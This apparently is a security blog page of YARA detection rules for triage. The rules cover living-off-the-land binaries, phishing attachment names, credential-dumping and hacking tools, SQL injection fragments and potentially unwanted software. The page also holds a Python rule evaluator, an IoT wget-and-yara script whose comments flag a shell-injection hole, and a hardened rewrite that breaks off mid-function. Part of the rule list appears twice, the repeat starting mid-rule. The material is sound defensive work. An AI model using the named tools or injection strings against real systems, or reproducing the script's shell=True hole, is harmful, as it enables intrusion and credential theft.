meta:
author = "@neonprimetime"
description = "Living Off the Land Command"
strings:
$string0 = "mshta.exe" nocase
$string1 = "nbtstat.exe" nocase
$string5 = "/query.exe" nocase
$string6 = "\\query.exe" nocase
$string8 = "bitsadmin.exe" nocase
$string9 = "curl.exe" nocase
$string10 = "wget.exe" nocase
$string11 = "systeminfo.exe" nocase
$string12 = "certutil.exe" nocase
condition:
1 of them
}
rule PhishingAttachmentThemePossible
{
meta:
author = "@neonprimetime"
description = "Phishing Attachment Theme Possible"
strings:
$string0a = "invoice." nocase
$string0b = "invoice " nocase
$string1 = "factura" nocase
$string2 = "wiretransfer" nocase
$string4a = "payment" nocase
$string4b = "payment." nocase
$string6a = "eFAX " nocase
$string6b = "eFAX." nocase
$string7 = "Fattura" nocase
$string8 = "Enquiry" nocase
$string9 = "QUOTATION" nocase
$string10a = "receipt " nocase
$string10b = "receipt." nocase
$string11a = "payroll." nocase
$string11b = "payroll " nocase
$string12 = "PO#" nocase
$string13 = "Proforma" nocase
$string14a = "Purchase." nocase
$string14b = "Purchase " nocase
$string14c = "PurchaseOrder" nocase
condition:
1 of them
}
rule ClearTextPasswordFile
{
meta:
author = "@neonprimetime"
description = "Clear Text Password File"
strings:
$string0 = "password.txt" nocase
$string1 = "pwd.txt" nocase
$string2 = "passwd.txt" nocase
$string3 = "password.doc" nocase
$string4 = "pwd.doc" nocase
$string5 = "passwd.doc" nocase
$string6 = "password.xls" nocase
$string7 = "pwd.xls" nocase
$string8 = "passwd.xls" nocase
$string9 = "passwords.txt" nocase
$string10 = "pwds.txt" nocase
$string11 = "passwds.txt" nocase
$string12 = "passwords.doc" nocase
$string13 = "pwds.doc" nocase
$string14 = "passwds.doc" nocase
$string15 = "passwords.xls" nocase
$string16 = "pwds.xls" nocase
$string17 = "passwds.xls" nocase
$string18 = "web.config" nocase
$string19 = "application.config" nocase
condition:
1 of them
}
rule AdminUrlAccessed
{
meta:
author = "@neonprimetime"
description = "Admin Web Pages"
strings:
$string0 = "/admin/" nocase
$string1 = "/wp-admin/" nocase
condition:
1 of them
}
rule HackingToolFound
{
meta:
author = "@neonprimetime"
description = "Hacking Tool Found"
strings:
$string0 = "kali.exe" nocase
$string2 = "wireshark" nocase
$string3 = "bloodhound" nocase
$string4 = "obfuscation" nocase
$string5 = "shellcode" nocase
$string6 = "keylogger" nocase
$string7 = "bypassuac" nocase
$string8 = "tokenmanipulation" nocase
$string10 = "passhash" nocase
$string11 = "kerberoast" nocase
$string12 = "ninja" nocase
$string13 = "memorynps" nocase
$string14 = "metasploit" nocase
$string15 = "smbexec" nocase
$string16 = "gpppassword" nocase
$string17 = "arpscan" nocase
$string18 = "dnscat" nocase
$string19 = "aircrack" nocase
$string20 = "bulletspassview" nocase
$string21 = "chromepass" nocase
$string22 = "credentialsfileview" nocase
$string23 = "echo.exe" nocase
$string24 = "hydra.exe" nocase
$string25 = "iepv.exe" nocase
$string26 = "inssidersetup" nocase
$string28 = "mailpv.exe" nocase
$string29 = "ministumblersetup" nocase
$string33 = "netpass.exe" nocase
$string34 = "netstumbler" nocase
$string35 = "nltest.exe" nocase
$string36 = "ophcrack" nocase
$string37 = "rdpv.exe" nocase
$string38 = "setspn" nocase
$string39 = "sniffpass" nocase
$string40 = "vaultpasswordview" nocase
$string41 = "\\ver.exe" nocase
$string42 = "vncpassview" nocase
$string43 = "webbrowserpassview" nocase
condition:
1 of them
}
rule HackingCodeFound
{
meta:
author = "@neonprimetime"
description = "Hacking Code Found"
strings:
$string0 = "WriteProcessMemory" nocase
$string1 = "VirtualAlloc" nocase
$string2 = "SetWindowsHook" nocase
$string3 = "SHCreateThread" nocase
$string4 = "FromBase64String" nocase
$string5 = "PromptForCredential" nocase
$string6 = "AdjustTokenPrivileges" nocase
$string7 = "KerberosRequestorSecurityToken" nocase
$string8 = "UnsafeNativeMethods" nocase
$string9 = "ReadProcessMemoryMiniDumpWriteDump" nocase
$string10 = "TOKEN_ADJUST_PRIVILEGES" nocase
$string11 = "TOKEN_IMPERSONATE" nocase
$string12 = "TOKEN_ELEVATION" nocase
$string13 = "TOKEN_ALL_ACCESS" nocase
condition:
1 of them
}
rule PasswordDumpAttempt
{
meta:
author = "@neonprimetime"
description = "Password Dump Temp"
strings:
$string0 = "mimikatz" nocase
$string1 = "procdump" nocase
$string3 = "hashdump" nocase
$string4 = "pwdump" nocase
$string5 = "lsadump" nocase
condition:
1 of them
}
rule ExternalDriveAccessed
{
meta:
author = "@neonprimetime"
description = "External Drive Accessed"
strings:
$string4 = "file:///f:/" nocase
$string6 = "file:///g:/" nocase
$string8 = "mfeprom" nocase
condition:
1 of them
}
rule HackerOutputFile
{
meta:
author = "@neonprimetime"
description = "Hacker Output Files"
strings:
$string0 = "acls.csv" nocase
$string1 = "bloodhound.csv" nocase
$string2 = "dump.csv" nocase
$string3 = "dump.xml" nocase
$string4 = "dump.zip" nocase
$string5 = "firewall.txt" nocase
$string6 = "group_memberships.csv" nocase
$string7 = "hashdump.txt" nocase
$string8 = "local_admins.csv" nocase
$string9 = "lsadump.txt" nocase
$string10 = "lsass.dmp" nocase
$string11 = "lsassdump.dmp" nocase
$string12 = "mimikatz.xls" nocase
$string13 = "mini.dmp" nocase
$string14 = "netscan.xml" nocase
$string15 = "nmap.csv" nocase
$string16 = "nmap.txt" nocase
$string17 = "nmap.xml" nocase
$string18 = "openvas.csv" nocase
$string19 = "pwdump.txt" nocase
$string20 = "secretsdump.txt" nocase
$string21 = "targets.txt" nocase
$string22 = "trusts.csv" nocase
$string23 = "user_sessions.csv" nocase
$string24 = "bloodhound.bin" nocase
$string25 = ".gnmap" nocase
$string26 = ".nessus" nocase
$string27 = ".nmap" nocase
$string28 = "p0wn" nocase
condition:
1 of them
}
rule HackerUrl
{
meta:
author = "@neonprimetime"
description = "Hacker Url"
strings:
$string1 = "kali." nocase
$string2 = "/kali/" nocase
$string3 = "kali-" nocase
$string4 = "backbox." nocase
$string5 = "/backbox/" nocase
$string6 = "backbox-" nocase
$string7 = "blackarch." nocase
$string8 = "/blackarch/" nocase
$string9 = "blackarch-" nocase
$string10 = "caine-live." nocase
$string11 = "/caine-live/" nocase
$string12 = "caine-live-" nocase
$string13 = "deftlinux." nocase
$string14 = "/deftlinux/" nocase
$string15 = "deftlinux-" nocase
$string16 = "parrotsec." nocase
$string17 = "/parrotsec/" nocase
$string18 = "parrotsec-" nocase
$string19a = "altlinux." nocase
$string19b = "/altlinux/" nocase
$string20 = "altlinux-" nocase
$string21 = "digi77." nocase
$string22 = "/digi77/" nocase
$string23 = "digi77-" nocase
$string24 = ".paterva." nocase
$string25 = "portswigger." nocase
$string26 = "exploit-db." nocase
$string27 = "/exploit-db/" nocase
$string28 = "exploit-db-" nocase
$string29 = "parrot.sh" nocase
$string30 = "/parrot.sh/" nocase
$string31 = "basealt.ru" nocase
$string32 = "/basealt.ru/" nocase
$string33 = "basealt.ru-" nocase
$string34 = "0day.today" nocase
$string35 = "/0day.today/" nocase
$string36a = "0day.today-" nocase
$string36b = "archstrike." nocase
$string37 = "/archstrike/" nocase
$string38 = "archstrike-" nocase
condition:
1 of them
}
rule PUPSoftware
{
meta:
author = "@neonprimetime"
description = "Potentially Unwanted Software"
strings:
$string0 = "adusetup" nocase
$string1 = "advanced driver" nocase
$string2 = "anytimeastrology" nocase
$string3 = "aplusgamer" nocase
$string4 = "apnsetup" nocase
$string5 = "apnstub" nocase
$string6 = "ascsetup" nocase
$string7 = "astromenda" nocase
$string8 = "atozmanuals" nocase
$string9 = "atwrun" nocase
$string10 = "audiotoaudio" nocase
$string11 = "bringmesports" nocase
$string12 = "bytefence" nocase
$string13 = "calendarspark" nocase
$string14 = "ccleaner" nocase
$string15 = "citysearch" nocase
$string16 = "convertpdfsnowtooltab" nocase
$string17 = "coupon companion" nocase
$string18 = "couponscom" nocase
$string19 = "cursormania" nocase
$string20 = "dailybibleguide" nocase
$string21 = "dailyrecipeguidetooltab" nocase
$string22 = "dailywellnessguide" nocase
$string23 = "dictionaryboss" nocase
$string24 = "directionsandmap" nocase
$string25 = "discoverancestry" nocase
$string26 = "discoverliveradio" nocase
$string27 = "disk-defrag-setup" nocase
$string28 = "downspeedtest" nocase
$string29 = "driver-updater-setup" nocase
$string30 = "driver.talent" nocase
$string31 = "driverassist-setup" nocase
$string32 = "driverdoc" nocase
$string33 = "drivereasy" nocase
$string34 = "driverrestore" nocase
$string35 = "driversupport" nocase
$string36 = "drivertalent" nocase
$string37 = "drivertoolkit" nocase
$string38 = "driverupdate-" nocase
$string39 = "driverupdate-downloader" nocase
$string40 = "driverupdate-setup" nocase
$string41 = "driverwhiz" nocase
$string42 = "easeware" nocase
$string43 = "easydriverpro" nocase
$string44 = "easyhomedecorating" nocase
$string45 = "easypdfcombine" nocase
$string46 = "easyphotoedit" nocase
$string47 = "eliteunzip" nocase
$string48 = "emailaccessonline" nocase
$string49 = "everyday lookup" nocase
$string50 = "everydaylookup" nocase
$string51 = "filefanatic" nocase
$string52 = "filesharefanatic" nocase
$string53 = "flashplayerpro" nocase
$string54 = "flightsearchapp" nocase
$string55 = "freemakevideoconvertersetup" nocase
$string56 = "freemanuals" nocase
$string57 = "freeradiocast" nocase
$string58 = "fromdoctopdftooltab" nocase
$string59 = "funcustomcreations" nocase
$string60 = "gamingassassin" nocase
$string61 = "gamingwonderland" nocase
$string62 = "garden enthusiast" nocase
$string63 = "gardeningenthusiast" nocase
$string64 = "getflightinfo" nocase
$string65 = "getformsonline" nocase
$string66 = "gettvstreamnow" nocase
$string67 = "gifables" nocase
$string68 = "happinessinfusion" nocase
$string69 = "headlinealley" nocase
$string70 = "howtosimplified" nocase
$string71 = "howtosuite" nocase
$string72 = "inboxace" nocase
$string73 = "internetspeedtracker" nocase
$string74 = "knowthebible" nocase
$string75 = "localcrimewatcher" nocase
$string76 = "mapsgalaxy" nocase
$string77 = "marineaquariumlite" nocase
$string78 = "mergedocsonline" nocase
$string79 = "mydailyrunway" nocase
$string80 = "myeasylotto" nocase
$string81 = "myformsfinder" nocase
$string82 = "myfuncards" nocase
$string83 = "mynewsguide" nocase
$string84 = "mypcbackup" nocase
$string85 = "myradioplayer" nocase
$string86 = "myscrapnook" nocase
$string87 = "mysocialshortcut" nocase
$string88 = "mytelevisionhq" nocase
$string89 = "mytransitguide" nocase
$string90 = "myweatherradar" nocase
$string91 = "mywebface" nocase
$string92 = "notehomepage" nocase
$string93 = "onlinemapfinder" nocase
$string94 = "openfreely" nocase
$string95 = "packagetracer" nocase
$string96 = "pckeeper" nocase
$string97 = "pdfconverterhq" nocase
$string98 = "photofriendzy" nocase
$string99 = "playpoptrivia" nocase
$string100 = "playthruplayer" nocase
$string101 = "popularscreensavers" nocase
$string102 = "ppc-software" nocase
$string103 = "premierdownloadmanager" nocase
$string104 = "procleaningsoftware" nocase
$string105 = "productivityboss" nocase
$string106 = "productmanualsfinder" nocase
$string107 = "propccleaner" nocase
$string108 = "puzzlegamesdaily" nocase
$string109 = "quotationcafe" nocase
$string110 = "qyuninst" nocase
$string111 = "radiorage" nocase
$string112 = "readingfanatic" nocase
$string113 = "registry-cleaner" nocase
$string114 = "regservo" nocase
$string115 = "removedt" nocase
$string116 = "safepcrepair" nocase
$string117 = "scenichomepage" nocase
$string118 = "searchbar" nocase
$string119 = "searchformsonline" nocase
$string120 = "searchpredict" nocase
$string121 = "slimcleanerplus" nocase
$string122 = "smsfrombrowser" nocase
$string123 = "snapmyscreen" nocase
$string124 = "soccerinferno" nocase
$string125 = "spyhunter" nocase
$string126 = "studyhq" nocase
$string127 = "sweepstakesalley" nocase
$string128 = "tbieaddin.dll" nocase
$string129 = "televisionfanatic" nocase
$string130 = "ticketxplorer" nocase
$string131 = "timewhackers" nocase
$string132 = "tooltabextension.dll" nocase
$string133 = "totalrecipesearch" nocase
$string134 = "trackapackage" nocase
$string135 = "translationbuddy" nocase
$string136 = "unifiedlogger.dll" nocase
$string137 = "utility chest" nocase
$string138 = "videodownloadconverter" nocase
$string139 = "votinstw" nocase
$string140 = "votprx" nocase
$string141 = "wb-setup" nocase
$string142 = "web_bar" nocase
$string143 = "webdiscover" nocase
$string144 = "webdiscoverbrowserdownloaderwebesc" nocase
$string145 = "webext_dl" nocase
$string146 = "winwb" nocase
$string147 = "yourtemplatefindertooltab" nocase
$string148 = "ysearchsettool" nocase
$string149 = "ysearchutilsvc" nocase
condition:
1 of them
}
rule ActiveDirectoryDomainFlag
{
meta:
author = "@neonprimetime"
description = "AD domain flag"
strings:
$string0 = " /domain " nocase
condition:
1 of them
}
rule ActiveDirectoryCreateFlag
{
meta:
author = "@neonprimetime"
description = "AD Create flag"
strings:
$string0 = " /add " nocase
$string1 = " /create " nocase
condition:
1 of them
}
rule MetasploitPort
{
meta:
author = "@neonprimetime"
description = "Metasploit Port"
strings:
$string0 = ":4444" nocase
condition:
1 of them
}
rule AdminFileShareAccess
{
meta:
author = "@neonprimetime"
description = "Admin File Share Access"
strings:
$string0 = "admin$" nocase
condition:
1 of them
}
rule TeamViewerPort
{
meta:
author = "@neonprimetime"
description = "TeamViewer Port"
strings:
$string0 = ":5938" nocase
condition:
1 of them
}
rule ActiveDirectoryCriticalGroup
{
meta:
author = "@neonprimetime"
description = "Critical AD groups"
strings:
$string0 = "domain admins" nocase
$string1 = "enterprise admins" nocase
$string2 = "schema admins" nocase
$string3 = "workstation admins" nocase
$string4 = "dns admins" nocase
$string5 = "server admins" nocase
condition:
1 of them
}
rule NewUser
{
meta:
author = "@neonprimetime"
description = "New User Commands"
strings:
$string0 = "new-localuser" nocase
$string1 = "new-aduser" nocase
condition:
1 of them
}
rule WebDownloader
{
meta:
author = "@neonprimetime"
description = "Web Downloader"
strings:
$string0 = "DownloadFile(" nocase
$string1 = "DownloadString" nocase
$string2 = "WebRequest" nocase
$string3 = "wget" nocase
$string4 = "bitstransfer" nocase
condition:
1 of them
}
rule McAfeeQuarantineFile
{
meta:
author = "@neonprimetime"
description = "McAfee Quarantine File"
strings:
$string0 = "\\quarantine\\" nocase
$string1 = ".bup" nocase
condition:
1 of them
}
rule VulnerabilityScanner
{
meta:
author = "@neonprimetime"
description = "Vulnerability Scanner"
strings:
$string0 = "AngryIP" nocase
$string1a = "\\Nmap " nocase
$string1b = "/Nmap." nocase
$string1c = " Nmap " nocase
$string1d = " Nmap." nocase
$string2 = "Nessus" nocase
$string3 = "sqlmap" nocase
$string4 = "nikto" nocase
$string5 = "wpscan" nocase
$string6 = "hydra" nocase
$string7 = "dirbuster" nocase
$string8 = "masscan" nocase
$string9 = "morfeus" nocase
$string10 = "sqlninja" nocase
condition:
1 of them
}
rule SqlInjection
{
meta:
author = "@neonprimetime"
description = "Sql Injection"
strings:
$string0 = "UNION+ALL+SELECT" nocase
$string1 = ",NULL,NULL" nocase
$string2 = "AND+SLEEP" nocase
$string3 = "PG_SLEEP" nocase
$string4 = "WAITFOR+DELAY" nocase
$string5 = "CONCAT(0x" nocase
$string6 = "UNION+SELECT" nocase
$string7 = "--+" nocase
$string8 = "')UNION ALL SELECT" nocase
$string9 = ",NULL,NULL" nocase
$string10 = "AND SLEEP" nocase
$string11 = "WAITFOR DELAY" nocase
$string12 = "CONCAT(0x" nocase
$string13 = "UNION SELECT" nocase
$string14 = "UNION+ALL+SELECT" nocase
$string15 = "AND+SLEEP" nocase
$string16 = "WAITFOR+DELAY" nocase
$string17 = "UNION+SELECT)" nocase
condition:
1 of them
}
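All of the triage rules above, and the User Agent rule before them, are plain case-insensitive substring matches joined by `1 of them`. As an added example (not code from the post or from @neonprimetime), here is a minimal Python evaluator for exactly that YARA subset, so the rules can be run over proxy, URL or process-creation log lines without yara-python, plus a lint for string identifiers reused inside one rule, which real YARA refuses to compile. The rule text and the log lines embedded in it are constructed for the example and modelled on the shape of the rules above; they are not the post's rules or real log data.

```python
"""Minimal evaluator for substring-style YARA triage rules.

Handles the subset used by the rules above: plain text strings with an
optional `nocase` modifier and an `N of them` / `any of them` /
`all of them` condition, written one token per line as in the post.
"""
import re

STRING_RE = re.compile(r'\$(\w+)\s*=\s*"((?:[^"\\]|\\.)*)"\s*(nocase)?')
RULE_HEAD_RE = re.compile(r'rule\s+(\w+)\s*\{?$')
CONDITION_RE = re.compile(r'(\d+|any|all)\s+of\s+them$')

# Constructed rule text (example only). The repeated $string2 in the first
# rule is deliberate: it reproduces the duplicated-identifier defect that
# yara rejects at compile time, so the lint below has something to find.
RULE_TEXT = r'''
rule LateralMovementAttempt
{
meta:
description = "constructed example"
strings:
$string0 = "mstsc" nocase
$string1 = "psexec" nocase
$string2 = "\\nc.exe" nocase
$string2 = "\\nc64.exe" nocase
condition:
1 of them
}
rule ShortExecutableName
{
strings:
$string0 = "/a.exe" nocase
$string1 = "\\a.exe" nocase
condition:
1 of them
}
rule MetasploitPort
{
strings:
$string0 = ":4444" nocase
condition:
1 of them
}
'''

# Constructed proxy / process log lines, not real data.
SAMPLE_LOG = [
    "GET http://10.0.0.5:4444/A.EXE HTTP/1.1",
    r"C:\Windows\System32\mstsc.exe /v:fileserver01",
    r"C:\Temp\nc.exe",
    "GET https://intranet.example.test/index.html HTTP/1.1",
]


def unescape(text):
    """Decode YARA text-string escapes (backslash, quote, t, n, r, xNN)."""
    table = {"n": "\n", "t": "\t", "r": "\r"}

    def sub(m):
        esc = m.group(1)
        if esc.startswith("x"):
            return chr(int(esc[1:], 16))
        return table.get(esc, esc)

    return re.sub(r'\\(x[0-9a-fA-F]{2}|.)', sub, text)


def parse_rules(text):
    """Parse rule name, string list and condition from YARA source text."""
    rules, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        head = RULE_HEAD_RE.match(line)
        if head:
            cur = {"name": head.group(1), "strings": [], "condition": ""}
            rules.append(cur)
            section = None
        elif cur is None or line == "{":
            continue
        elif line == "}":
            cur, section = None, None
        elif line in ("meta:", "strings:", "condition:"):
            section = line[:-1]
        elif section == "strings":
            m = STRING_RE.match(line)
            if m:
                cur["strings"].append(("$" + m.group(1), unescape(m.group(2)), bool(m.group(3))))
        elif section == "condition":
            cur["condition"] = line
    return rules


def duplicate_identifiers(rules):
    """(rule, identifier) pairs reused within one rule; yara rejects these."""
    dups = []
    for rule in rules:
        seen = set()
        for ident, _, _ in rule["strings"]:
            if ident in seen:
                dups.append((rule["name"], ident))
            seen.add(ident)
    return dups


def condition_met(condition, n_hits, n_strings):
    """Evaluate an `N of them` / `any of them` / `all of them` condition."""
    m = CONDITION_RE.match(condition)
    if not m:
        raise ValueError("unsupported condition: %r" % condition)
    quantity = m.group(1)
    needed = 1 if quantity == "any" else n_strings if quantity == "all" else int(quantity)
    return n_hits >= needed


def evaluate(rules, line):
    """Map each firing rule name to the string identifiers that matched."""
    fired = {}
    for rule in rules:
        hits = []
        for ident, needle, nocase in rule["strings"]:
            hay = line.lower() if nocase else line
            if (needle.lower() if nocase else needle) in hay:
                hits.append(ident)
        if condition_met(rule["condition"], len(hits), len(rule["strings"])):
            fired[rule["name"]] = hits
    return fired


def triage(rules, lines):
    """Return (line, fired) for every line that triggers at least one rule."""
    return [(line, evaluate(rules, line)) for line in lines if evaluate(rules, line)]


RULES = parse_rules(RULE_TEXT)

if __name__ == "__main__":
    for rule_name, ident in duplicate_identifiers(RULES):
        print("lint: %s reuses %s (yara would refuse to compile)" % (rule_name, ident))
    for line, fired in triage(RULES, SAMPLE_LOG):
        print(line, "->", fired)
```

Because many of the strings are very short substrings (`ninja`, `sample`, `ruler`, `wget`, `payment`), the output is a triage queue to review rather than an alert, which is why `evaluate` returns the identifiers that fired: over a day of logs that lets you see which strings carry the noise and prune or tighten them before loading the rules into real yara.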
$string66 = "gettvstreamnow" nocase
$string67 = "gifables" nocase
$string68 = "happinessinfusion" nocase
$string69 = "headlinealley" nocase
$string70 = "howtosimplified" nocase
$string71 = "howtosuite" nocase
$string72 = "inboxace" nocase
$string73 = "internetspeedtracker" nocase
$string74 = "knowthebible" nocase
$string75 = "localcrimewatcher" nocase
$string76 = "mapsgalaxy" nocase
$string77 = "marineaquariumlite" nocase
$string78 = "mergedocsonline" nocase
$string79 = "mydailyrunway" nocase
$string80 = "myeasylotto" nocase
$string81 = "myformsfinder" nocase
$string82 = "myfuncards" nocase
$string83 = "mynewsguide" nocase
$string84 = "mypcbackup" nocase
$string85 = "myradioplayer" nocase
$string86 = "myscrapnook" nocase
$string87 = "mysocialshortcut" nocase
$string88 = "mytelevisionhq" nocase
$string89 = "mytransitguide" nocase
$string90 = "myweatherradar" nocase
$string91 = "mywebface" nocase
$string92 = "notehomepage" nocase
$string93 = "onlinemapfinder" nocase
$string94 = "openfreely" nocase
$string95 = "packagetracer" nocase
$string96 = "pckeeper" nocase
$string97 = "pdfconverterhq" nocase
$string98 = "photofriendzy" nocase
$string99 = "playpoptrivia" nocase
$string100 = "playthruplayer" nocase
$string101 = "popularscreensavers" nocase
$string102 = "ppc-software" nocase
$string103 = "premierdownloadmanager" nocase
$string104 = "procleaningsoftware" nocase
$string105 = "productivityboss" nocase
$string106 = "productmanualsfinder" nocase
$string107 = "propccleaner" nocase
$string108 = "puzzlegamesdaily" nocase
$string109 = "quotationcafe" nocase
$string110 = "qyuninst" nocase
$string111 = "radiorage" nocase
$string112 = "readingfanatic" nocase
$string113 = "registry-cleaner" nocase
$string114 = "regservo" nocase
$string115 = "removedt" nocase
$string116 = "safepcrepair" nocase
$string117 = "scenichomepage" nocase
$string118 = "searchbar" nocase
$string119 = "searchformsonline" nocase
$string120 = "searchpredict" nocase
$string121 = "slimcleanerplus" nocase
$string122 = "smsfrombrowser" nocase
$string123 = "snapmyscreen" nocase
$string124 = "soccerinferno" nocase
$string125 = "spyhunter" nocase
$string126 = "studyhq" nocase
$string127 = "sweepstakesalley" nocase
$string128 = "tbieaddin.dll" nocase
$string129 = "televisionfanatic" nocase
$string130 = "ticketxplorer" nocase
$string131 = "timewhackers" nocase
$string132 = "tooltabextension.dll" nocase
$string133 = "totalrecipesearch" nocase
$string134 = "trackapackage" nocase
$string135 = "translationbuddy" nocase
$string136 = "unifiedlogger.dll" nocase
$string137 = "utility chest" nocase
$string138 = "videodownloadconverter" nocase
$string139 = "votinstw" nocase
$string140 = "votprx" nocase
$string141 = "wb-setup" nocase
$string142 = "web_bar" nocase
$string143 = "webdiscover" nocase
$string144 = "webdiscoverbrowserdownloaderwebesc" nocase
$string145 = "webext_dl" nocase
$string146 = "winwb" nocase
$string147 = "yourtemplatefindertooltab" nocase
$string148 = "ysearchsettool" nocase
$string149 = "ysearchutilsvc" nocase
condition:
1 of them
}
rule ActiveDirectoryDomainFlag
{
meta:
author = "@neonprimetime"
description = "AD domain flag"
strings:
$string0 = " /domain " nocase
condition:
1 of them
}
rule ActiveDirectoryCreateFlag
{
meta:
author = "@neonprimetime"
description = "AD Create flag"
strings:
$string0 = " /add " nocase
$string1 = " /create " nocase
condition:
1 of them
}
rule MetasploitPort
{
meta:
author = "@neonprimetime"
description = "Metasploit Port"
strings:
$string0 = ":4444" nocase
condition:
1 of them
}
rule AdminFileShareAccess
{
meta:
author = "@neonprimetime"
description = "Admin File Share Access"
strings:
$string0 = "admin$" nocase
condition:
1 of them
}
rule TeamViewerPort
{
meta:
author = "@neonprimetime"
description = "TeamViewer Port"
strings:
$string0 = ":5938" nocase
condition:
1 of them
}
rule ActiveDirectoryCriticalGroup
{
meta:
author = "@neonprimetime"
description = "Critical AD groups"
strings:
$string0 = "domain admins" nocase
$string1 = "enterprise admins" nocase
$string2 = "schema admins" nocase
$string3 = "workstation admins" nocase
$string4 = "dns admins" nocase
$string5 = "server admins" nocase
condition:
1 of them
}
rule NewUser
{
meta:
author = "@neonprimetime"
description = "New User Commands"
strings:
$string0 = "new-localuser" nocase
$string1 = "new-aduser" nocase
condition:
1 of them
}
rule WebDownloader
{
meta:
author = "@neonprimetime"
description = "Web Downloader"
strings:
$string0 = "DownloadFile(" nocase
$string1 = "DownloadString" nocase
$string2 = "WebRequest" nocase
$string3 = "wget" nocase
$string4 = "bitstransfer" nocase
condition:
1 of them
}
rule McAfeeQuarantineFile
{
meta:
author = "@neonprimetime"
description = "McAfee Quarantine File"
strings:
$string0 = "\\quarantine\\" nocase
$string1 = ".bup" nocase
condition:
1 of them
}
rule VulnerabilityScanner
{
meta:
author = "@neonprimetime"
description = "Vulnerability Scanner"
strings:
$string0 = "AngryIP" nocase
$string1a = "\\Nmap " nocase
$string1b = "/Nmap." nocase
$string1c = " Nmap " nocase
$string1d = " Nmap." nocase
$string2 = "Nessus" nocase
$string3 = "sqlmap" nocase
$string4 = "nikto" nocase
$string5 = "wpscan" nocase
$string6 = "hydra" nocase
$string7 = "dirbuster" nocase
$string8 = "masscan" nocase
$string9 = "morfeus" nocase
$string10 = "sqlninja" nocase
condition:
1 of them
}
rule SqlInjection
{
meta:
author = "@neonprimetime"
description = "Sql Injection"
strings:
$string0 = "UNION+ALL+SELECT" nocase
$string1 = ",NULL,NULL" nocase
$string2 = "AND+SLEEP" nocase
$string3 = "PG_SLEEP" nocase
$string4 = "WAITFOR+DELAY" nocase
$string5 = "CONCAT(0x" nocase
$string6 = "UNION+SELECT" nocase
$string7 = "--+" nocase
$string8 = "')UNION ALL SELECT" nocase
$string9 = ",NULL,NULL" nocase
$string10 = "AND SLEEP" nocase
$string11 = "WAITFOR DELAY" nocase
$string12 = "CONCAT(0x" nocase
$string13 = "UNION SELECT" nocase
$string14 = "UNION+ALL+SELECT" nocase
$string15 = "AND+SLEEP" nocase
$string16 = "WAITFOR+DELAY" nocase
$string17 = "UNION+SELECT)" nocase
condition:
1 of them
}
Monday, November 25, 2019
kali update apt-get upgrade
apt-get update (gets the sources lists for packages)
apt-get upgrade (upgrade tools)
apt-get dist-upgrade (entire kali rolling)
apt-get autoremove (removes dependencies no longer needed)
Wednesday, November 6, 2019
Python IoT search with Wget and Yara Rules
# Given a list of urls, determine what type of IoT device (or any device for that matter) they are based on you plugging in Yara rules into the .yar files
import os
import subprocess
import traceback

debug = "false"
skipDownload = "false"
inputFile = "urls.txt"  # one url per line (renamed from 'input' so the builtin is not shadowed)
yaraSpecificRuleFile = "IoTSpecific.yar"
yaraGenericRuleFile = "IoTGeneric.yar"
wgetParams = "--quiet --no-check-certificate --timeout=2 --tries=3"
yaraParams = ""
outputExt = ".html"

urls = open(inputFile, "r")
if skipDownload == "false":
    for url in urls:
        url = url.rstrip()
        # turn the url into a file name with no path separators or shell-significant characters
        cleanurl = url.replace('/','_').replace('\\','_').replace(':','_').replace('.','_').replace('&','_').replace('?','_').replace('=','_').replace('%','_') + outputExt
        # the url itself is interpolated into a shell command line (shell=True), so urls.txt must be trusted input
        wgetCommand = ("wget %s --output-document=%s %s 2>/dev/null" % (wgetParams, cleanurl, url))
        if debug == "true":
            print(("DEBUG,Starting Download of '%s' to '%s'" % (url, cleanurl)))
        try:
            # universal_newlines=True returns str instead of bytes, so the substring test works on Python 3
            output = subprocess.check_output(wgetCommand, shell=True, universal_newlines=True)
            if "error" in output:
                print(("ERROR,Unable to download '%s' error '%s'" % (wgetCommand, output)))
        except Exception:
            # format_exc() returns the traceback text; print_exc() only prints it and returns None
            print(("ERROR,Unable to download '%s' error '%s'" % (wgetCommand, traceback.format_exc())))
        if debug == "true":
            print(("DEBUG,Finished Download of '%s' to '%s'" % (url, cleanurl)))

# scan every downloaded page: specific rules first, generic rules only when nothing specific matched
for htmlfile in os.listdir('.'):
    if htmlfile.endswith(".html"):
        if os.stat(htmlfile).st_size == 0:
            print(("NoResponse,%s" % (htmlfile)))
        else:
            yaraCommand = ("yara %s %s %s" % (yaraParams, yaraSpecificRuleFile, htmlfile))
            if debug == "true":
                print(("DEBUG,Starting Scanning: '%s'" % (htmlfile)))
            try:
                output = subprocess.check_output(yaraCommand, shell=True, universal_newlines=True)
                if "error" in output:
                    print(("ERROR,Unable to Scan '%s' error '%s'" % (yaraCommand, output)))
                if output:
                    # yara prints "rulename filename"; emit it as csv
                    output = output.rstrip()
                    print(output.replace(" ",","))
                else:
                    yaraRescanCommand = ("yara %s %s %s" % (yaraParams, yaraGenericRuleFile, htmlfile))
                    if debug == "true":
                        print(("DEBUG,Starting ReScanning: '%s'" % (htmlfile)))
                    try:
                        output = subprocess.check_output(yaraRescanCommand, shell=True, universal_newlines=True)
                        if "error" in output:
                            print(("ERROR,Unable to ReScan '%s' error '%s'" % (yaraRescanCommand, output)))
                        if output:
                            output = output.rstrip()
                            print(output.replace(" ",","))
                        else:
                            print(("NoMatch,%s" % (htmlfile)))
                    except Exception:
                        print(("ERROR,Unable to ReScan '%s' error '%s'" % (yaraRescanCommand, traceback.format_exc())))
                    if debug == "true":
                        print(("DEBUG,Finished ReScanning: '%s'" % (htmlfile)))
            except Exception:
                print(("ERROR,Unable to Scan '%s' error '%s'" % (yaraCommand, traceback.format_exc())))
            if debug == "true":
                print(("DEBUG,Finished Scanning: '%s'" % (htmlfile)))
urls.close()
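The script above builds each wget and yara command as a single string and hands it to a shell (shell=True), so whatever is in urls.txt is interpreted by the shell, not just by wget. The following is an added example (not code from the original post) that keeps the same download, scan-specific, fall-back-to-generic flow but passes argument vectors directly, validates that each line is an http(s) URL, and derives an output file name that cannot escape the working directory. All function names (validate_url, safe_output_name, wget_argv, yara_argv, parse_yara_output, run_argv, download_and_scan) are this example's own; it assumes wget and yara are on PATH and that IoTSpecific.yar / IoTGeneric.yar exist in the current directory.

```python
import os
import re
import subprocess
from urllib.parse import urlsplit


def validate_url(url):
    """Accept only http(s) URLs with a host part; anything else in urls.txt is rejected before wget sees it."""
    parts = urlsplit(url.strip())
    if parts.scheme not in ("http", "https") or not parts.netloc:
        raise ValueError("refusing non-http(s) url: %r" % url)
    return parts.geturl()


def safe_output_name(url, ext=".html"):
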